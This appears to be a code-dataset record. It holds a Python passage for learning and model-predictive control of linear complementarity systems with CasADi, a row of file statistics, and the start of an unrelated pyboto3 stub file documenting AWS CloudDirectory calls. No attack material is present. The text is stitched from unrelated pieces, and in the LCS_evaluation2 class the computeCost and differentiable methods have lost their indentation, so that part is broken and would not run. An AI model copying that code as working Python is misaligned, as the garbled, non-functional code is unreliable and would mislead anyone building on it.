                init_w = self.warm_start[i]
                init_w[0:self.n_state] = DM(init_state)
            # Solve the NLP
            sol = self.oc_solver(x0=init_w, lbx=lbw, ubx=ubw, lbg=self.lbg, ubg=self.ubg, p=oc_para)
            w_opt = sol['x']
            w_opt_batch += [w_opt]
            # extract the optimal control and state (per-step [x; u; lam]
            # columns, plus the dangling terminal state)
            sol_traj = w_opt[0:self.control_horizon * (self.n_state + self.n_control + self.n_lam)].reshape(
                (self.n_state + self.n_control + self.n_lam, -1))
            x_traj = casadi.horzcat(sol_traj[0:self.n_state, :],
                                    w_opt[self.control_horizon * (self.n_state + self.n_control + self.n_lam):]).T
            u_traj = sol_traj[self.n_state:self.n_state + self.n_control, :].T
            lam_traj = sol_traj[self.n_state + self.n_control:, :].T
            updated_control_traj_batch += [u_traj.full()]
            updated_pred_state_traj_batch += [x_traj.full()]
            updated_pred_lam_traj_batch += [lam_traj.full()]
        self.warm_start = w_opt_batch
        return updated_control_traj_batch
# compute the gradient of the control input using the recovery matrix (Jin. et al. IJRR)
# evaluation object to evaluate the learned lcs model using a control cost function
# random_initial condition
class LCS_evaluation2:
    def __init__(self, lcs_learner):
        """Copy the system dimensions from the learner and create symbols."""
        self.name = 'lcs evaluation'
        # define the system variables
        self.n_state = lcs_learner.n_state
        self.n_control = lcs_learner.n_control
        self.n_lam = lcs_learner.n_lam
        # define the system variables
        self.x = SX.sym('x', self.n_state)
        self.u = SX.sym('u', self.n_control)
        self.lam = SX.sym('lam', self.n_lam)
    def setCostFunction(self, Q, R, QN, control_horizon):
        """Define the quadratic path cost x'Qx + u'Ru and final cost x'QNx."""
        self.Q = DM(Q)
        self.R = DM(R)
        self.QN = DM(QN)
        self.control_horizon = control_horizon
        # define the control cost function
        self.path_cost = dot(self.x, self.Q @ self.x) + dot(self.u, self.R @ self.u)
        self.final_cost = dot(self.x, self.QN @ self.x)
        self.path_cost_fn = Function('path_cost_fn', [self.x, self.u], [self.path_cost])
        self.final_cost_fn = Function('final_cost_fn', [self.x], [self.final_cost])
def computeCost(self, control_traj_batch, state_traj_batch):
cost_batch = []
batch_size = len(control_traj_batch)
for i in range(batch_size):
u_traj = control_traj_batch[i]
x_traj = state_traj_batch[i]
cost = 0.0
for t in range(self.control_horizon):
curr_x = x_traj[t]
curr_u = u_traj[t]
cost += self.path_cost_fn(curr_x, curr_u)
cost += self.final_cost_fn(x_traj[-1])
cost_batch += [cost]
return cost_batch
def differentiable(self):
self.A = SX.sym('A', self.n_state, self.n_state)
self.B = SX.sym('B', self.n_state, self.n_control)
self.C = SX.sym('C', self.n_state, self.n_lam)
self.D = SX.sym('D', self.n_lam, self.n_state)
self.E = SX.sym('E', self.n_lam, self.n_control)
self.F = SX.sym('F', self.n_lam, self.n_lam)
self.lcp_offset = SX.sym('lcp_offset', self.n_lam)
self.lcs_theta = vertcat(vec(self.A), vec(self.B), vec(self.C),
vec(self.D), vec(self.E), vec(self.F),
vec(self.lcp_offset))
# define the dynamics
self.f = self.A @ self.x + self.B @ self.u + self.C @ self.lam
# define the gradient of lam with respect to lcp_theta
self.dist = self.D @ self.x + self.E @ self.u + self.F @ self.lam + self.lcp_offset
g = diag(self.lam) @ self.dist
dg_dlam = jacobian(g, self.lam)
dg_dx = jacobian(g, self.x)
dg_du = jacobian(g, self.u)
dlam_dx = -inv(dg_dlam) @ dg_dx
dlam_du = -inv(dg_dlam) @ dg_du
# differentiate
df_dx = jacobian(self.f, self.x) + jacobian(self.f, self.lam) @ dlam_dx
df_du = jacobian(self.f, self.u) + jacobian(self.f, self.lam) @ dlam_du
self.dfdx_fn = Function('dfdx_fn', [self.x, self.u, self.lam, self.lcs_theta], [df_dx])
self.dfdu_fn = Function('dfdx_fn', [self.x, self.u, self.lam, self.lcs_theta], [df_du])
# compute the gradient of the cost function
self.dcdx = jacobian(self.path_cost, self.x).T
self.dcdu = jacobian(self.path_cost, self.u).T
self.dhdx = jacobian(self.final_cost, self.x).T
# establish the functions for the above gradient
self.dcdx_fn = Function('dcdx_fn', [self.x, self.u], [self.dcdx])
self.dcdu_fn = Function('dcdu_fn', [self.x, self.u], [self.dcdu])
self.dhdx_fn = Function('dhdx_fn', [self.x], [self.dhdx])
# Then I think about to update the control sequence using multiple-shooting (this can be further improved)
def initializeUpdater(self, proximity_epsilon=1e-2):
    # Build (once) the multiple-shooting NLP used to update control sequences.
    # Decision vector layout: [X0, U0, Lam0, X1, U1, Lam1, ..., X_T].
    # NLP parameters: one reference control Uk_ref per step, followed by the
    # flattened LCS matrices (self.lcs_theta).
    # proximity_epsilon weights the proximal term ||Uk - Uk_ref||^2 / eps
    # that keeps the updated controls close to the reference controls.
    self.differentiable()
    # Start with an empty NLP
    w = []      # decision variables
    w0 = []     # initial guess
    lbw = []    # lower bounds on w
    ubw = []    # upper bounds on w
    J = 0       # accumulated cost
    g = []      # constraint expressions
    lbg = []    # lower bounds on g
    ubg = []    # upper bounds on g
    p = []      # NLP parameters
    # "Lift" initial conditions: X0 is a decision variable pinned by equal
    # lower/upper bounds (the actual state is written into lbw/ubw at solve time)
    Xk = casadi.SX.sym('X0', self.n_state)
    w += [Xk]
    lbw += np.zeros(self.n_state).tolist()
    ubw += np.zeros(self.n_state).tolist()
    w0 += np.zeros(self.n_state).tolist()
    # formulate the NLP
    for k in range(self.control_horizon):
        # New NLP variable for the control
        Uk = casadi.SX.sym('U_' + str(k), self.n_control)
        w += [Uk]
        lbw += self.n_control * [-inf]
        ubw += self.n_control * [inf]
        w0 += self.n_control * [0.]
        # new NLP variable for the complementarity variable (lam >= 0)
        Lamk = casadi.SX.sym('lam' + str(k), self.n_lam)
        w += [Lamk]
        lbw += self.n_lam * [0.]
        ubw += self.n_lam * [inf]
        w0 += self.n_lam * [0.]
        # LCP feasibility: D x + E u + F lam + offset >= 0
        g += [self.D @ Xk + self.E @ Uk + self.F @ Lamk + self.lcp_offset]
        lbg += self.n_lam * [0.]
        ubg += self.n_lam * [inf]
        # LCP complementarity: lam . (D x + E u + F lam + offset) == 0
        g += [casadi.dot(self.D @ Xk + self.E @ Uk + self.F @ Lamk + self.lcp_offset, Lamk)]
        lbg += [0.]
        ubg += [0.]
        # Integrate till the end of the interval
        Xnext = self.A @ Xk + self.B @ Uk + self.C @ Lamk
        # stage cost: quadratic state/control cost plus the proximal term
        Uk_ref = SX.sym('Uk_ref' + str(k), self.n_control)
        p += [Uk_ref]
        Ck = dot(Xk, self.Q @ Xk) + dot(Uk, self.R @ Uk) + dot(Uk - Uk_ref, Uk - Uk_ref) / proximity_epsilon
        J = J + Ck
        # New NLP variable for state at end of interval
        Xk = casadi.SX.sym('X_' + str(k + 1), self.n_state)
        w += [Xk]
        lbw += self.n_state * [-inf]
        ubw += self.n_state * [inf]
        w0 += self.n_state * [0.]
        # multiple-shooting defect constraint: predicted next state == Xk
        g += [Xnext - Xk]
        lbg += self.n_state * [0.]
        ubg += self.n_state * [0.]
    # Add the final cost
    J = J + dot(Xk, self.QN @ Xk)
    # Create an NLP solver and solve
    p += [self.lcs_theta]
    opts = {'ipopt.print_level': 0, 'ipopt.sb': 'yes', 'print_time': 0}
    prob = {'f': J, 'x': casadi.vertcat(*w), 'g': casadi.vertcat(*g), 'p': vertcat(*p)}
    self.oc_solver = casadi.nlpsol('solver', 'ipopt', prob, opts)
    # cache bounds and initial guess for repeated solves
    self.lbw = DM(lbw)
    self.ubw = DM(ubw)
    self.lbg = DM(lbg)
    self.ubg = DM(ubg)
    self.w0 = DM(w0)
    self.prev_init_state_batch = []
def EvaluateMS(self, lcs_learner, init_state_batch, control_traj_batch):
    """Update a batch of control trajectories with one proximal
    multiple-shooting solve against the learner's current LCS model.

    For each initial state, the NLP built by initializeUpdater() is solved
    with the batch-mean control trajectory as the proximal reference, and
    the optimized control trajectory is collected.

    Returns:
        list of updated control trajectories, one numpy array of shape
        (control_horizon, n_control) per batch element.
    """
    # lazily build the solver on first use
    if not hasattr(self, 'oc_solver'):
        self.initializeUpdater()
    lcs_theta = lcs_learner.computeLCSMats()
    # roll out the current learned dynamics (kept for API parity and
    # debugging; the predictions are not used below)
    pred_state_traj_batch, pred_lam_traj_batch = lcs_learner.sim_dyn(init_state_batch, control_traj_batch)
    batch_size = len(control_traj_batch)
    updated_control_traj_batch = []
    updated_pred_state_traj_batch = []
    updated_pred_lam_traj_batch = []
    # warm-start bookkeeping for the next call
    curr_init_state_batch = []
    # Proximal reference: the mean of all control trajectories in the batch.
    # BUG FIX: the sum previously accumulated control_traj_batch[i]
    # (the same trajectory batch_size times) instead of iterating over j;
    # the loop is also hoisted out of the per-sample loop since it is invariant.
    sum_u_traj = 0
    for j in range(batch_size):
        sum_u_traj += control_traj_batch[j]
    mean_u_traj = sum_u_traj / batch_size
    for i in range(batch_size):
        init_state = init_state_batch[i]
        # pin the lifted initial state with equal bounds (these DM objects
        # alias self.lbw/self.ubw/self.w0; the touched entries are
        # overwritten on every iteration, so the aliasing is benign)
        lbw = self.lbw
        ubw = self.ubw
        lbw[0:self.n_state] = DM(init_state)
        ubw[0:self.n_state] = DM(init_state)
        init_w = self.w0
        init_w[0:self.n_state] = DM(init_state)
        # NLP parameters: reference controls followed by the LCS parameters
        oc_para = vertcat(mean_u_traj.flatten(), lcs_theta)
        # Solve the NLP
        sol = self.oc_solver(x0=init_w, lbx=lbw, ubx=ubw, lbg=self.lbg, ubg=self.ubg, p=oc_para)
        w_opt = sol['x']
        # unpack the stacked solution [X0, U0, Lam0, X1, U1, Lam1, ..., X_T]
        sol_traj = w_opt[0:self.control_horizon * (self.n_state + self.n_control + self.n_lam)].reshape(
            (self.n_state + self.n_control + self.n_lam, -1))
        x_traj = casadi.horzcat(sol_traj[0:self.n_state, :],
                                w_opt[self.control_horizon * (self.n_state + self.n_control + self.n_lam):]).T
        u_traj = sol_traj[self.n_state:self.n_state + self.n_control, :].T
        lam_traj = sol_traj[self.n_state + self.n_control:, :].T
        updated_control_traj_batch += [u_traj.full()]
        updated_pred_state_traj_batch += [x_traj.full()]
        updated_pred_lam_traj_batch += [lam_traj.full()]
    self.prev_init_state_batch = curr_init_state_batch
    return updated_control_traj_batch
# compute the gradient of the control input using the recovery matrix (Jin. et al. IJRR)
# evaluation object to evaluate the learned lcs model using a control cost function
# random_initial condition
class MPC_Controller:
    """Model-predictive controller for a learned linear complementarity
    system (LCS):

        x_next = A x + B u + C lam
        0 <= lam,  D x + E u + F lam + lcp_offset >= 0,
        lam . (D x + E u + F lam + lcp_offset) = 0

    The LCS matrices enter the NLP as a parameter vector (lcs_theta), so
    a single solver object built by initializeMPC() can be reused as the
    model is re-learned.
    """

    def __init__(self, lcs_learner):
        self.name = 'lcs evaluation'
        # system dimensions, taken from the learner
        self.n_state = lcs_learner.n_state
        self.n_control = lcs_learner.n_control
        self.n_lam = lcs_learner.n_lam
        # symbolic system variables
        self.x = SX.sym('x', self.n_state)
        self.u = SX.sym('u', self.n_control)
        self.lam = SX.sym('lam', self.n_lam)
        # symbolic LCS parameter matrices
        self.A = SX.sym('A', self.n_state, self.n_state)
        self.B = SX.sym('B', self.n_state, self.n_control)
        self.C = SX.sym('C', self.n_state, self.n_lam)
        self.D = SX.sym('D', self.n_lam, self.n_state)
        self.E = SX.sym('E', self.n_lam, self.n_control)
        self.F = SX.sym('F', self.n_lam, self.n_lam)
        self.lcp_offset = SX.sym('lcp_offset', self.n_lam)
        # flattened parameter vector; the ordering must match what
        # lcs_learner.computeLCSMats() produces
        self.lcs_theta = vertcat(vec(self.A), vec(self.B), vec(self.C),
                                 vec(self.D), vec(self.E), vec(self.F),
                                 vec(self.lcp_offset))
        # define the dynamics
        self.f = self.A @ self.x + self.B @ self.u + self.C @ self.lam

    def setCostFunction(self, Q, R, QN):
        """Set the quadratic path cost x'Qx + u'Ru and final cost x'QNx,
        and build the corresponding CasADi cost Functions."""
        self.Q = DM(Q)
        self.R = DM(R)
        self.QN = DM(QN)
        # define the control cost function
        self.path_cost = dot(self.x, self.Q @ self.x) + dot(self.u, self.R @ self.u)
        self.final_cost = dot(self.x, self.QN @ self.x)
        self.path_cost_fn = Function('path_cost_fn', [self.x, self.u], [self.path_cost])
        self.final_cost_fn = Function('final_cost_fn', [self.x], [self.final_cost])

    def computeCost(self, control_traj_batch, state_traj_batch):
        """Evaluate the accumulated path + final cost for each
        (control trajectory, state trajectory) pair in the batch.

        Returns a list with one scalar cost per batch element.
        """
        cost_batch = []
        batch_size = len(control_traj_batch)
        for i in range(batch_size):
            u_traj = control_traj_batch[i]
            x_traj = state_traj_batch[i]
            cost = 0.0
            # horizon is taken from the control trajectory itself, so
            # trajectories of different lengths are handled correctly
            control_horizon = u_traj.shape[0]
            for t in range(control_horizon):
                cost += self.path_cost_fn(x_traj[t], u_traj[t])
            cost += self.final_cost_fn(x_traj[-1])
            cost_batch += [cost]
        return cost_batch

    def differentiable(self):
        """Build the differentiable dynamics/cost gradient Functions via the
        implicit-function theorem on the LCP condition (see class docstring)."""
        # gradient of lam with respect to x and u
        self.dist = self.D @ self.x + self.E @ self.u + self.F @ self.lam + self.lcp_offset
        g = diag(self.lam) @ self.dist
        dg_dlam = jacobian(g, self.lam)
        dg_dx = jacobian(g, self.x)
        dg_du = jacobian(g, self.u)
        dlam_dx = -inv(dg_dlam) @ dg_dx
        dlam_du = -inv(dg_dlam) @ dg_du
        # total derivatives of the dynamics (chain rule through lam)
        df_dx = jacobian(self.f, self.x) + jacobian(self.f, self.lam) @ dlam_dx
        df_du = jacobian(self.f, self.u) + jacobian(self.f, self.lam) @ dlam_du
        self.dfdx_fn = Function('dfdx_fn', [self.x, self.u, self.lam, self.lcs_theta], [df_dx])
        # BUG FIX: this Function was previously misnamed 'dfdx_fn' (duplicate)
        self.dfdu_fn = Function('dfdu_fn', [self.x, self.u, self.lam, self.lcs_theta], [df_du])
        # gradients of the path and final cost
        self.dcdx = jacobian(self.path_cost, self.x).T
        self.dcdu = jacobian(self.path_cost, self.u).T
        self.dhdx = jacobian(self.final_cost, self.x).T
        self.dcdx_fn = Function('dcdx_fn', [self.x, self.u], [self.dcdx])
        self.dcdu_fn = Function('dcdu_fn', [self.x, self.u], [self.dcdu])
        self.dhdx_fn = Function('dhdx_fn', [self.x], [self.dhdx])

    def initializeMPC(self, mpc_horizon):
        """Build the multiple-shooting MPC NLP over the given horizon.

        Decision vector layout: [X0, U0, Lam0, X1, U1, Lam1, ..., X_T];
        the NLP parameter is the flattened LCS matrix vector. Requires
        setCostFunction() to have been called (uses self.Q/R/QN).
        """
        self.mpc_horizon = mpc_horizon
        # Start with an empty NLP
        w = []      # decision variables
        w0 = []     # initial guess
        lbw = []    # lower bounds on w
        ubw = []    # upper bounds on w
        J = 0       # accumulated cost
        g = []      # constraint expressions
        lbg = []    # lower bounds on g
        ubg = []    # upper bounds on g
        lcs_theta = vertcat(vec(self.A), vec(self.B), vec(self.C),
                            vec(self.D), vec(self.E), vec(self.F),
                            vec(self.lcp_offset))
        # "Lift" initial conditions: X0 pinned by equal bounds at solve time
        Xk = casadi.SX.sym('X0', self.n_state)
        w += [Xk]
        lbw += np.zeros(self.n_state).tolist()
        ubw += np.zeros(self.n_state).tolist()
        w0 += np.zeros(self.n_state).tolist()
        # formulate the NLP
        for k in range(self.mpc_horizon):
            # New NLP variable for the control
            Uk = casadi.SX.sym('U_' + str(k), self.n_control)
            w += [Uk]
            lbw += self.n_control * [-inf]
            ubw += self.n_control * [inf]
            w0 += self.n_control * [0.]
            # new NLP variable for the complementarity variable (lam >= 0)
            Lamk = casadi.SX.sym('lam' + str(k), self.n_lam)
            w += [Lamk]
            lbw += self.n_lam * [0.]
            ubw += self.n_lam * [inf]
            w0 += self.n_lam * [0.]
            # LCP feasibility: D x + E u + F lam + offset >= 0
            g += [self.D @ Xk + self.E @ Uk + self.F @ Lamk + self.lcp_offset]
            lbg += self.n_lam * [0.]
            ubg += self.n_lam * [inf]
            # LCP complementarity: lam . (D x + E u + F lam + offset) == 0
            g += [casadi.dot(self.D @ Xk + self.E @ Uk + self.F @ Lamk + self.lcp_offset, Lamk)]
            lbg += [0.]
            ubg += [0.]
            # Integrate till the end of the interval
            Xnext = self.A @ Xk + self.B @ Uk + self.C @ Lamk
            # stage cost
            Ck = dot(Xk, self.Q @ Xk) + dot(Uk, self.R @ Uk)
            J = J + Ck
            # New NLP variable for state at end of interval
            Xk = casadi.SX.sym('X_' + str(k + 1), self.n_state)
            w += [Xk]
            lbw += self.n_state * [-inf]
            ubw += self.n_state * [inf]
            w0 += self.n_state * [0.]
            # multiple-shooting defect constraint
            g += [Xnext - Xk]
            lbg += self.n_state * [0.]
            ubg += self.n_state * [0.]
        # Add the final cost
        J = J + dot(Xk, self.QN @ Xk)
        # Create an NLP solver and solve
        opts = {'ipopt.print_level': 0, 'ipopt.sb': 'yes', 'print_time': 0}
        prob = {'f': J, 'x': casadi.vertcat(*w), 'g': casadi.vertcat(*g), 'p': lcs_theta}
        self.oc_solver = casadi.nlpsol('solver', 'ipopt', prob, opts)
        # cache bounds and initial guess for repeated solves
        self.lbw = DM(lbw)
        self.ubw = DM(ubw)
        self.lbg = DM(lbg)
        self.ubg = DM(ubg)
        self.w0 = DM(w0)

    def mpc(self, lcs_learner, state_batch, lcs_theta=None):
        """One-step MPC for a batch of current states.

        lcs_theta: optional explicit LCS parameter vector; when None it is
        pulled from the learner via computeLCSMats().
        Returns a list with the first-step optimal control (flat numpy
        array) for each state. Updates self.w0 for warm starting.
        """
        if lcs_theta is None:
            lcs_theta = lcs_learner.computeLCSMats()
        # do the one step mpc
        state_batch = list(state_batch)
        control_batch = []
        oc_parameters = DM(lcs_theta)
        for state in state_batch:
            # pin the lifted initial state with equal bounds and warm-start
            # from the previous solution stored in self.w0
            self.lbw[0:self.n_state] = DM(state)
            self.ubw[0:self.n_state] = DM(state)
            self.w0[0:self.n_state] = DM(state)
            sol = self.oc_solver(x0=self.w0, lbx=self.lbw, ubx=self.ubw,
                                 lbg=self.lbg, ubg=self.ubg, p=oc_parameters)
            w_opt = sol['x']
            # warm start the next solve
            self.w0 = w_opt
            # the first control U_0 sits right after X_0 in the decision vector
            control_batch += [w_opt[self.n_state:self.n_state + self.n_control].full().flatten()]
        return control_batch

    def mpc_step(self, lcs_learner, curr_state, lcs_theta=None):
        """One MPC step from a single state; returns the first optimal
        control as a flat numpy array. Updates self.w0 for warm starting."""
        if lcs_theta is None:
            lcs_theta = lcs_learner.computeLCSMats()
        # pin the lifted initial state with equal bounds
        self.lbw[0:self.n_state] = DM(curr_state)
        self.ubw[0:self.n_state] = DM(curr_state)
        self.w0[0:self.n_state] = DM(curr_state)
        sol = self.oc_solver(x0=self.w0, lbx=self.lbw, ubx=self.ubw,
                             lbg=self.lbg, ubg=self.ubg, p=DM(lcs_theta))
        w_opt = sol['x']
        # warm start the next solve
        self.w0 = w_opt
        curr_control = w_opt[self.n_state:self.n_state + self.n_control].full().flatten()
        return curr_control
def find_closest(candidate_rows, query):
    """Return the index of the row in candidate_rows with the smallest
    2-norm distance to query (the first such row wins on ties)."""
    best_index = 0
    best_distance = inf
    for idx, candidate in enumerate(candidate_rows):
        distance = norm_2(candidate - query)
        if distance < best_distance:
            best_distance = distance
            best_index = idx
    return best_index
def dataReorgnize(batch_traj):
    """Transpose a time-major batch (a sequence over time, each entry holding
    one row per batch element) into a batch-major list, one numpy array of
    shape (horizon, ...) per trajectory."""
    traj_horizon = len(batch_traj)
    batch_size = len(batch_traj[0])
    return [np.array([batch_traj[t][b] for t in range(traj_horizon)])
            for b in range(batch_size)]
| 39.427984
| 120
| 0.58427
| 12,814
| 86,229
| 3.667473
| 0.031372
| 0.037132
| 0.032557
| 0.021747
| 0.891946
| 0.860475
| 0.840898
| 0.828514
| 0.813874
| 0.809639
| 0
| 0.006913
| 0.292094
| 86,229
| 2,186
| 121
| 39.44602
| 0.762966
| 0.106832
| 0
| 0.764113
| 0
| 0
| 0.021083
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.039651
| false
| 0
| 0.002688
| 0
| 0.071237
| 0.012769
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5b3e0be69f009eee01ef3f2cdcb3b40bceb2dd1f
| 361,746
|
py
|
Python
|
pyboto3/clouddirectory.py
|
gehad-shaat/pyboto3
|
4a0c2851a8bc04fb1c71c36086f7bb257e48181d
|
[
"MIT"
] | 91
|
2016-12-31T11:38:37.000Z
|
2021-09-16T19:33:23.000Z
|
pyboto3/clouddirectory.py
|
gehad-shaat/pyboto3
|
4a0c2851a8bc04fb1c71c36086f7bb257e48181d
|
[
"MIT"
] | 7
|
2017-01-02T18:54:23.000Z
|
2020-08-11T13:54:02.000Z
|
pyboto3/clouddirectory.py
|
gehad-shaat/pyboto3
|
4a0c2851a8bc04fb1c71c36086f7bb257e48181d
|
[
"MIT"
] | 26
|
2016-12-31T13:11:00.000Z
|
2022-03-03T21:01:12.000Z
|
'''
The MIT License (MIT)
Copyright (c) 2016 WavyCloud
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
def add_facet_to_object(DirectoryArn=None, SchemaFacet=None, ObjectAttributeList=None, ObjectReference=None):
    """
    Adds a new Facet to an object. An object can have more than one facet applied on it.
    See also: AWS API Documentation
    Exceptions
    :example: response = client.add_facet_to_object(
        DirectoryArn='string',
        SchemaFacet={
            'SchemaArn': 'string',
            'FacetName': 'string'
        },
        ObjectAttributeList=[
            {
                'Key': {
                    'SchemaArn': 'string',
                    'FacetName': 'string',
                    'Name': 'string'
                },
                'Value': {
                    'StringValue': 'string',
                    'BinaryValue': b'bytes',
                    'BooleanValue': True|False,
                    'NumberValue': 'string',
                    'DatetimeValue': datetime(2015, 1, 1)
                }
            },
        ],
        ObjectReference={
            'Selector': 'string'
        }
    )
    :type DirectoryArn: string
    :param DirectoryArn: [REQUIRED]\nThe Amazon Resource Name (ARN) that is associated with the Directory where the object resides. For more information, see arns .\n
    :type SchemaFacet: dict
    :param SchemaFacet: [REQUIRED]\nIdentifiers for the facet that you are adding to the object. See SchemaFacet for details.\n\nSchemaArn (string) --The ARN of the schema that contains the facet with no minor component. See arns and In-Place Schema Upgrade for a description of when to provide minor versions.\n\nFacetName (string) --The name of the facet.\n\n\n
    :type ObjectAttributeList: list
    :param ObjectAttributeList: Attributes on the facet that you are adding to the object.\n\n(dict) --The combination of an attribute key and an attribute value.\n\nKey (dict) -- [REQUIRED]The key of the attribute.\n\nSchemaArn (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the schema that contains the facet and attribute.\n\nFacetName (string) -- [REQUIRED]The name of the facet that the attribute exists within.\n\nName (string) -- [REQUIRED]The name of the attribute.\n\n\n\nValue (dict) -- [REQUIRED]The value of the attribute.\n\nStringValue (string) --A string data value.\n\nBinaryValue (bytes) --A binary data value.\n\nBooleanValue (boolean) --A Boolean data value.\n\nNumberValue (string) --A number data value.\n\nDatetimeValue (datetime) --A date and time value.\n\n\n\n\n\n\n
    :type ObjectReference: dict
    :param ObjectReference: [REQUIRED]\nA reference to the object you are adding the specified facet to.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n
    :rtype: dict
    ReturnsResponse Syntax
    {}
    Response Structure
    (dict) --
    Exceptions
    CloudDirectory.Client.exceptions.InternalServiceException
    CloudDirectory.Client.exceptions.InvalidArnException
    CloudDirectory.Client.exceptions.RetryableConflictException
    CloudDirectory.Client.exceptions.ValidationException
    CloudDirectory.Client.exceptions.LimitExceededException
    CloudDirectory.Client.exceptions.AccessDeniedException
    CloudDirectory.Client.exceptions.DirectoryNotEnabledException
    CloudDirectory.Client.exceptions.ResourceNotFoundException
    CloudDirectory.Client.exceptions.FacetValidationException
    :return: {}
    :returns:
    (dict) --
    """
    # Documentation-only stub (generated from the AWS CloudDirectory API);
    # the actual request is dispatched by the botocore client at runtime.
    pass
def apply_schema(PublishedSchemaArn=None, DirectoryArn=None):
    """
    Copies the input published schema, at the specified version, into the Directory with the same name and version as that of the published schema.
    See also: AWS API Documentation
    Exceptions
    :example: response = client.apply_schema(
        PublishedSchemaArn='string',
        DirectoryArn='string'
    )
    :type PublishedSchemaArn: string
    :param PublishedSchemaArn: [REQUIRED]\nPublished schema Amazon Resource Name (ARN) that needs to be copied. For more information, see arns .\n
    :type DirectoryArn: string
    :param DirectoryArn: [REQUIRED]\nThe Amazon Resource Name (ARN) that is associated with the Directory into which the schema is copied. For more information, see arns .\n
    :rtype: dict
    ReturnsResponse Syntax
    {
        'AppliedSchemaArn': 'string',
        'DirectoryArn': 'string'
    }
    Response Structure
    (dict) --
    AppliedSchemaArn (string) --
    The applied schema ARN that is associated with the copied schema in the Directory . You can use this ARN to describe the schema information applied on this directory. For more information, see arns .
    DirectoryArn (string) --
    The ARN that is associated with the Directory . For more information, see arns .
    Exceptions
    CloudDirectory.Client.exceptions.InternalServiceException
    CloudDirectory.Client.exceptions.InvalidArnException
    CloudDirectory.Client.exceptions.RetryableConflictException
    CloudDirectory.Client.exceptions.ValidationException
    CloudDirectory.Client.exceptions.LimitExceededException
    CloudDirectory.Client.exceptions.AccessDeniedException
    CloudDirectory.Client.exceptions.SchemaAlreadyExistsException
    CloudDirectory.Client.exceptions.ResourceNotFoundException
    CloudDirectory.Client.exceptions.InvalidAttachmentException
    :return: {
        'AppliedSchemaArn': 'string',
        'DirectoryArn': 'string'
    }
    :returns:
    CloudDirectory.Client.exceptions.InternalServiceException
    CloudDirectory.Client.exceptions.InvalidArnException
    CloudDirectory.Client.exceptions.RetryableConflictException
    CloudDirectory.Client.exceptions.ValidationException
    CloudDirectory.Client.exceptions.LimitExceededException
    CloudDirectory.Client.exceptions.AccessDeniedException
    CloudDirectory.Client.exceptions.SchemaAlreadyExistsException
    CloudDirectory.Client.exceptions.ResourceNotFoundException
    CloudDirectory.Client.exceptions.InvalidAttachmentException
    """
    # Documentation-only stub (generated from the AWS CloudDirectory API);
    # the actual request is dispatched by the botocore client at runtime.
    pass
def attach_object(DirectoryArn=None, ParentReference=None, ChildReference=None, LinkName=None):
    """
    Attaches an existing object to another object. An object can be accessed in two ways:
    See also: AWS API Documentation
    Exceptions
    :example: response = client.attach_object(
        DirectoryArn='string',
        ParentReference={
            'Selector': 'string'
        },
        ChildReference={
            'Selector': 'string'
        },
        LinkName='string'
    )
    :type DirectoryArn: string
    :param DirectoryArn: [REQUIRED]\nAmazon Resource Name (ARN) that is associated with the Directory where both objects reside. For more information, see arns .\n
    :type ParentReference: dict
    :param ParentReference: [REQUIRED]\nThe parent object reference.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n
    :type ChildReference: dict
    :param ChildReference: [REQUIRED]\nThe child object reference to be attached to the object.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n
    :type LinkName: string
    :param LinkName: [REQUIRED]\nThe link name with which the child object is attached to the parent.\n
    :rtype: dict
    ReturnsResponse Syntax
    {
        'AttachedObjectIdentifier': 'string'
    }
    Response Structure
    (dict) --
    AttachedObjectIdentifier (string) --
    The attached ObjectIdentifier , which is the child ObjectIdentifier .
    Exceptions
    CloudDirectory.Client.exceptions.InternalServiceException
    CloudDirectory.Client.exceptions.InvalidArnException
    CloudDirectory.Client.exceptions.RetryableConflictException
    CloudDirectory.Client.exceptions.ValidationException
